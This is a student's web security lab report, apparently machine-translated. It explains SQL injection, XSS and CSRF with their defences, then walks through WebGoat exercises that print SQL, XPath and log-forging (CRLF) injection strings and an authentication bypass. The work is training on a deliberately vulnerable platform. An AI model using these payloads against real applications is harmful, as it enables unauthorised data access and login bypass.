First, the basic question answer 1. SQL injection attack principle, how to defend?
- A SQL injection attack is the goal of tricking a server into executing a malicious SQL command by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request.
- The main protection against SQL injection attacks is to start with code:
- With precompiled statement set PreparedStatement, it has the ability to handle SQL injection, as long as it uses its Setxxx method to pass values. Its principle is that SQL injection only to the SQL statement Preparation (compilation) process has a destructive effect, and PreparedStatement is ready, the execution phase is only the input string as data processing, and no longer the SQL statements prepared for parsing, so also avoids the SQL injection problem;
- Filter incoming parameters with regular expressions and filter for some keywords containing SQL injection;
- Adopt the method of string filtering;
- The function called in the JSP checks if it contains illegal characters and prevents SQL from being injected from the URL.
2. What is the principle of XSS attack and how to defend it?
- The SS is a code injection that allows a malicious user to inject code into a Web page and be successfully executed by the browser, and other users will be affected when they view the page. Such attacks typically include HTML and client-side scripting languages. The main purpose of XSS attack is to find a way to obtain the cookie of the target attack website, because the cookie is equivalent to the seesion, and with this information can log on to the website in any PC that can connect to the Internet, and do some damage in the identity of others.
- Defenses can be carried out in the following two ways:
- Filter parameters before a form submission or URL parameter is passed
- Check the contents of user input for illegal content, such as angle brackets, quotation marks, etc., strictly control the output.
3. CSRF attack principle, how to defend?
- We know that XSS is a cross-site scripting attack that executes an attacker's script in the user's browser to obtain information such as its cookie. Instead, CSRF is borrowing the user's identity to send a request to Web server because the request is not intended by the user, so it is called "cross-site request forgery".
- The defense of CSSRF can be carried out from a few aspects;
- Referer, token or verification code to detect user submissions;
- Try not to expose the user's privacy information in the link of the page, for the user to modify the deletion and other operations preferably use post operation;
- Avoid general-purpose cookies and strictly set the domain of cookies.
Second, the practice content 1. About Webgoat
- Webgoat is an application platform developed by the OWASP Organization for Web vulnerability experiments to illustrate security vulnerabilities in Web applications. Webgoat is running on a platform with a Java virtual machine, there are many training courses available, including XSS, thread safety, SQL injection, and so on, our experiment is on the Webgoat platform.
- Webgoat is divided into simple version and Development Board, simple version is a Java jar package, only need to have a Java environment, we do in the command line: Java-jar Webgoat-container-7.0.1-war-exec.jar run Webgoat:
- Open will find their virtual machine is not installed, I am using Yang Zhenghui shared WebGoat7.1 downloaded, put it in the home, re-enter Java-jar Webgoat-server-7.1-exec.jar (because the version of 7.1 is downloaded, so the version number in the command needs to be changed again)
- Open Browser, enter Localhost:8080/webgoat
- Select the default account, password to log on successfully
2. SQL Practice Numeric SQL injection
- The principle is that there is an SQL statement here
- SELECT * from Weather_data WHERE station = [Station]
- Can intercept messages Add Station field to a permanent 101 OR 1=1
- You can use the debugging tools from the Firefox developer on Kail to open the text box.
- Modify the original statement to: SELECT * from Weather_data WHERE station = 101 OR 1=1
- As 1=1 Heng set up, click Go to see all the city's weather, success.
Log Spoofing
- Log forgery, the purpose is to inject a malicious string, according to the rules forged a log, the username input
- Zh%0d%0alogin succeeded for Username:admin
- Where%0d and%0a are CRLF newline characters, the output shown is
- The second line is the one we just forged.
XPATH Injection
- The meaning of the problem is your account number and password is mike/test123. Your goal is to try to view data from other employees.
- Or do you need to build a wing-
- CC ' or 1=1 or ' a ' = ' a
String SQL Injection
- Character injection, which is similar to the previous number injection method, constructs a permanent, or uses the previous ' or 1 = ' 1
- ' CC ' OR ' 1 ' = ' 1
- SELECT * from user_data WHERE last_name = ' cc ' OR ' 1 ' = ' 1 '
Lab:sql injectionstage 1:string SQL Injection
- Use string SQL injection to bypass authentication.
- Log in as user Neville, enter ' or 1=1 in the password field--Never do SQL injection, but find login failed. The maximum length of password found is 8, changing the maximum length to 100
EXP9 Web Security Basics Practice